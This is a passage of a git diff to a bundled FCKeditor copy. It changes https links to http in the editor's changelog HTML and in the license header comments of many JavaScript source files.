<I> and <U> for the bold, italic and underline commands. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1002622&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1002622&group_id=75348&atid=543656">SF Feature-1002622</a>] New <strong>Text Color</strong> and <strong>Background Color</strong> commands have been added to the editor. </li> <li>On Gecko browsers, a message is shown when, because of security settings, the @@ -2262,24 +2262,24 @@ editor to get the focus when the page is loaded. </li> <li>All <strong>Java </strong>integration files has been moved to a new separated package. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1016781&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1016781&group_id=75348&atid=543653">SF BUG-1016781</a>] <strong>Table operations</strong> are now working when right click inside a table. The following commands has been introduced: <strong>Insert Row</strong>, <strong>Delete Row</strong>, <strong>Insert Column</strong>, <strong>Delete Column</strong>, <strong>Insert Cell</strong> and <strong>Delete Cells</strong> . </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=965067&group_id=75348&atid=543653">SF - BUG-965067</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1010379&group_id=75348&atid=543653">SF - BUG-1010379</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=977713&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=965067&group_id=75348&atid=543653">SF + BUG-965067</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1010379&group_id=75348&atid=543653">SF + BUG-1010379</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=977713&group_id=75348&atid=543653">SF BUG-977713</a>] XHTML support was not working with FireFox, blocking the editor when submitting data. It has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1007547&group_id=75348&atid=543653">SF - BUG-1007547</a> ] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=974595&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1007547&group_id=75348&atid=543653">SF + BUG-1007547</a> ] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=974595&group_id=75348&atid=543653">SF BUG-974595</a> ] The "FCKLang not defined" error when loading has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1021028&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1021028&group_id=75348&atid=543653">SF BUG-1021028</a>] If the editor doesn't have the focus, some commands were been executed outside the editor in the place where the focus is. It has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=981191&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=981191&group_id=75348&atid=543653">SF BUG-981191</a>] We are now using <!--- ---> for ColdFusion comments.</li> </ul> <h3> @@ -2316,8 +2316,8 @@ <h3> Version 1.6.1</h3> <ul> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=862364&group_id=75348&atid=543653">SF - BUG-862364</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=812733&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=862364&group_id=75348&atid=543653">SF + BUG-862364</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=812733&group_id=75348&atid=543653">SF BUG-812733</a>] There was a problem when the user tried to delete the last row, collumn or cell in a table. It has been corrected.* </li> <li>New Estonian language file. Thanks to Kristjan Kivikangur </li> @@ -2327,7 +2327,7 @@ <li>Updated language file for Catalan. Thanks to Jordi Cerdan.</li> </ul> <p> - * This version has been partially sponsored by <a href="https://www.genuitec.com/">Genuitec, + * This version has been partially sponsored by <a href="http://www.genuitec.com/">Genuitec, LLC</a>.</p> <h3> Version 1.6</h3> @@ -2427,7 +2427,7 @@ buttons.</li> </ul> <p> - * This version has been partially sponsored by <a href="https://www.genuitec.com/">Genuitec, + * This version has been partially sponsored by <a href="http://www.genuitec.com/">Genuitec, LLC</a>.</p> <h3> Version 1.5</h3> @@ -2492,37 +2492,37 @@ the initial value. It should works well, but please make some tests before upgrading definitively. If there is any problem just uncomment the line in the fckeditor.php file (and send me a message!). </li> - <li>The editor is now integrated with <strong>ieSpell</strong> (<a href="https://www.iespell.com">https://www.iespell.com</a>) + <li>The editor is now integrated with <strong>ieSpell</strong> (<a href="http://www.iespell.com">http://www.iespell.com</a>) for <strong>Spell Checking</strong>. You can configure the download URL in then fck_config.js file. Thanks to Sanjay Sharma. (ieSpell is free for personal use but must be faid for commercial use) </li> <li><strong>Table</strong> and <strong>table cell</strong> dialogs has been changed. Now you can <strong>select the class</strong> you want to be applied. Thanks to Alexander Lezos. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=865378&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=865378&group_id=75348&atid=543656">SF Feature-865378</a>]A new <strong>upload support is available for ASP</strong>. It uses the /UserImages/ folder in the root of the web site as the files container and a counter controlled by the upload.cnt file. Both must have write permissions set to the IUSR_xxx user. Thanks to Trax and Juanjo. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=798128&group_id=75348&atid=543655">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=798128&group_id=75348&atid=543655">SF Patch-798128</a>] The user (programmer) can now define a <strong>custom separator</strong> for the list items of a combo in the toolbar. Thanks to Wulff D. Heiss. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=741963&group_id=75348&atid=543656">SF - Feature-741963</a>][<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=878941&group_id=75348&atid=543656">SF - Feature-878941</a>][<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=869389&group_id=75348&atid=543655">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=741963&group_id=75348&atid=543656">SF + Feature-741963</a>][<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=878941&group_id=75348&atid=543656">SF + Feature-878941</a>][<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=869389&group_id=75348&atid=543655">SF Patch-869389</a>] A minimal support for a “fake” <strong>TAB is now available</strong>, even if HTML has no support for TAB. Now when the user presses the TAB key a configurable number of spaces (&nbsp;) is added. Take a look at config.TabSpaces on the fck_config.js file. No action is performed if it is set to zero. The default value is 4. Thanks to Phil Hassey. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=782779&group_id=75348&atid=543653">SF - BUG-782779</a>][<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=790939&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=782779&group_id=75348&atid=543653">SF + BUG-782779</a>][<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=790939&group_id=75348&atid=543653">SF BUG-790939</a>] The problem with big images has been corrected. Thanks to Raver. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&atid=543653&aid=853374&group_id=75348">SF BUG-862975</a>] Now the editor does nothing if no image is selected in the image dialog box and the OK button is hit. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=851609&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=851609&group_id=75348&atid=543653">SF BUG-851609</a>] The problem with ASP and null values has been solved. </li> <li><strong>Norwegean</strong> language pack. Thanks to Martin Kronstad. </li> <li><strong>Hungarian</strong> language pack. Thanks to Balázs Szabó. @@ -2616,7 +2616,7 @@ Version 1.2.2</h3> <ul> <li>Language support for <strong>French</strong>. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=782779&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=782779&group_id=75348&atid=543653">SF BUG-782779</a>] Version 1.2 introduced a bug on the image dialog window: when changing the image, no update was done. This bug is now fixed. </li> </ul> @@ -2673,15 +2673,15 @@ is used for custom actions and behaviors. </li> <li>A problem with relative links and images like "/test/test.doc" has been solved. In prior versions, only with XHTML support enabled, the URL was changed - to something like "https://www.mysite.xxx/test/test.doc" (The domain was + to something like "http://www.mysite.xxx/test/test.doc" (The domain was automatically added). Now the XHTML cleaning procedure gets the URLs exactly how they are defined in the editor’s HTML. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=742168&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=742168&group_id=75348&atid=543653">SF BUG-742168</a>] Mouse drag and drop from toolbar buttons has been disabled. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=768210&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=768210&group_id=75348&atid=543653">SF BUG-768210</a>] HTML entities, like <strong>&lt;</strong>, were not load correctly. The problem is solved. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=748812&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=748812&group_id=75348&atid=543653">SF BUG-748812</a>] The link dialog window doesn't open when the link button is grayed. </li> </ul> diff --git a/admin/FCKeditor/editor/_source/classes/fckcontextmenu.js b/admin/FCKeditor/editor/_source/classes/fckcontextmenu.js index 9dd2736..0050f22 100755 --- a/admin/FCKeditor/editor/_source/classes/fckcontextmenu.js +++ b/admin/FCKeditor/editor/_source/classes/fckcontextmenu.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckdocumentfragment_gecko.js b/admin/FCKeditor/editor/_source/classes/fckdocumentfragment_gecko.js index 5b88b23..8252355 100755 --- a/admin/FCKeditor/editor/_source/classes/fckdocumentfragment_gecko.js +++ b/admin/FCKeditor/editor/_source/classes/fckdocumentfragment_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckdocumentfragment_ie.js b/admin/FCKeditor/editor/_source/classes/fckdocumentfragment_ie.js index 9645c27..bf0f1cd 100755 --- a/admin/FCKeditor/editor/_source/classes/fckdocumentfragment_ie.js +++ b/admin/FCKeditor/editor/_source/classes/fckdocumentfragment_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckdomrange.js b/admin/FCKeditor/editor/_source/classes/fckdomrange.js index 92c79a9..23fb6ad 100755 --- a/admin/FCKeditor/editor/_source/classes/fckdomrange.js +++ b/admin/FCKeditor/editor/_source/classes/fckdomrange.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckdomrange_gecko.js b/admin/FCKeditor/editor/_source/classes/fckdomrange_gecko.js index 51d7317..a09a1ee 100755 --- a/admin/FCKeditor/editor/_source/classes/fckdomrange_gecko.js +++ b/admin/FCKeditor/editor/_source/classes/fckdomrange_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckdomrange_ie.js b/admin/FCKeditor/editor/_source/classes/fckdomrange_ie.js index da76197..042aa4d 100755 --- a/admin/FCKeditor/editor/_source/classes/fckdomrange_ie.js +++ b/admin/FCKeditor/editor/_source/classes/fckdomrange_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckeditingarea.js b/admin/FCKeditor/editor/_source/classes/fckeditingarea.js index 0720d24..7b7abed 100755 --- a/admin/FCKeditor/editor/_source/classes/fckeditingarea.js +++ b/admin/FCKeditor/editor/_source/classes/fckeditingarea.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -188,7 +188,7 @@ FCKEditingArea.prototype.MakeEditable = function() catch (e) { // As evidenced here, useCSS is deprecated in favor of styleWithCSS: - // https://www.mozilla.org/editor/midas-spec.html + // http://www.mozilla.org/editor/midas-spec.html oDoc.execCommand( 'useCSS', false, !FCKConfig.GeckoUseSPAN ) ; } @@ -215,7 +215,7 @@ FCKEditingArea.prototype.Focus = function() if ( this.Mode == FCK_EDITMODE_WYSIWYG ) { // The following check is important to avoid IE entering in a focus loop. Ref: - // https://sourceforge.net/tracker/index.php?func=detail&aid=1567060&group_id=75348&atid=543653 + // http://sourceforge.net/tracker/index.php?func=detail&aid=1567060&group_id=75348&atid=543653 if ( FCKBrowserInfo.IsIE && this.Document.hasFocus() ) return ; diff --git a/admin/FCKeditor/editor/_source/classes/fckelementpath.js b/admin/FCKeditor/editor/_source/classes/fckelementpath.js index d9f682c..bdad032 100755 --- a/admin/FCKeditor/editor/_source/classes/fckelementpath.js +++ b/admin/FCKeditor/editor/_source/classes/fckelementpath.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckenterkey.js b/admin/FCKeditor/editor/_source/classes/fckenterkey.js index e446948..e0ee82c 100755 --- a/admin/FCKeditor/editor/_source/classes/fckenterkey.js +++ b/admin/FCKeditor/editor/_source/classes/fckenterkey.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckevents.js b/admin/FCKeditor/editor/_source/classes/fckevents.js index b84d9c4..54c4aed 100755 --- a/admin/FCKeditor/editor/_source/classes/fckevents.js +++ b/admin/FCKeditor/editor/_source/classes/fckevents.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckicon.js b/admin/FCKeditor/editor/_source/classes/fckicon.js index 6ef5438..1859941 100755 --- a/admin/FCKeditor/editor/_source/classes/fckicon.js +++ b/admin/FCKeditor/editor/_source/classes/fckicon.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckiecleanup.js b/admin/FCKeditor/editor/_source/classes/fckiecleanup.js index 1bc6e31..22c43dd 100755 --- a/admin/FCKeditor/editor/_source/classes/fckiecleanup.js +++ b/admin/FCKeditor/editor/_source/classes/fckiecleanup.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckimagepreloader.js b/admin/FCKeditor/editor/_source/classes/fckimagepreloader.js index 412afd3..ec68111 100755 --- a/admin/FCKeditor/editor/_source/classes/fckimagepreloader.js +++ b/admin/FCKeditor/editor/_source/classes/fckimagepreloader.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckkeystrokehandler.js b/admin/FCKeditor/editor/_source/classes/fckkeystrokehandler.js index b67fd4a..89667b3 100755 --- a/admin/FCKeditor/editor/_source/classes/fckkeystrokehandler.js +++ b/admin/FCKeditor/editor/_source/classes/fckkeystrokehandler.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckmenublock.js b/admin/FCKeditor/editor/_source/classes/fckmenublock.js index 525ec9a..4f1ffb2 100755 --- a/admin/FCKeditor/editor/_source/classes/fckmenublock.js +++ b/admin/FCKeditor/editor/_source/classes/fckmenublock.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckmenublockpanel.js b/admin/FCKeditor/editor/_source/classes/fckmenublockpanel.js index 3085a43..36cf083 100755 --- a/admin/FCKeditor/editor/_source/classes/fckmenublockpanel.js +++ b/admin/FCKeditor/editor/_source/classes/fckmenublockpanel.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckmenuitem.js b/admin/FCKeditor/editor/_source/classes/fckmenuitem.js index 579da55..9e51ba1 100755 --- a/admin/FCKeditor/editor/_source/classes/fckmenuitem.js +++ b/admin/FCKeditor/editor/_source/classes/fckmenuitem.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckpanel.js b/admin/FCKeditor/editor/_source/classes/fckpanel.js index 9d4c3db..667bffd 100755 --- a/admin/FCKeditor/editor/_source/classes/fckpanel.js +++ b/admin/FCKeditor/editor/_source/classes/fckpanel.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/classes/fckplugin.js b/admin/FCKeditor/editor/_source/classes/fckplugin.js index 8350918..72b52f2 100755 --- a/admin/FCKeditor/editor/_source/classes/fckplugin.js +++ b/admin/FCKeditor/editor/_source/classes/fckplugin.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * 